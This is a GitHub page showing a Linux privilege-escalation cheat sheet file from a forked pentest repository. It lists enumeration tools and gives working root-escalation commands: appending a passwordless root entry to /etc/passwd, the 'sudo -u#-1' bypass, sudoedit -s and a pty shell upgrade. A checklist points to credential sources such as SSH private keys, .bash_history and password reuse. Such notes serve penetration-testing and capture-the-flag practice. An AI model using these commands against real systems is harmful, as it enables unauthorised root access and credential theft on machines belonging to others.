forked from Gimpy42/CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 2
/
lpe
54 lines (45 loc) · 1.37 KB
/
lpe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# Linux Priviledge Escalation
# Enumeration scripts
bash LinEnum.sh
bash lse.sh -l 1
bash linpeas.sh
python linuxprivchecker.py
./unix-privesc-check standard
# Vulnerability scan
perl les2.pl
bash les.sh
# Suid checker
python suid3num.py
https://gtfobins.github.io/
# Methodology to follow
https://guif.re/linuxeop
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
# Look at:
# If result is compiler look at *kernel* exploit
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
# Writable /etc/passwd
echo 'dummy::0:0::/root:/bin/bash' >> /etc/passwd
# SUID
find / -perm -4000 2>/dev/null
# Pimp Shell
python -c 'import pty; pty.spawn("/bin/bash")'
# Other
sudo -l
sudo -u#-1 /bin/bash
sudoedit -s /bin/bash
OS Exploits
Password reuse (mysql, .bash_history, 000- default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (PreInvoke)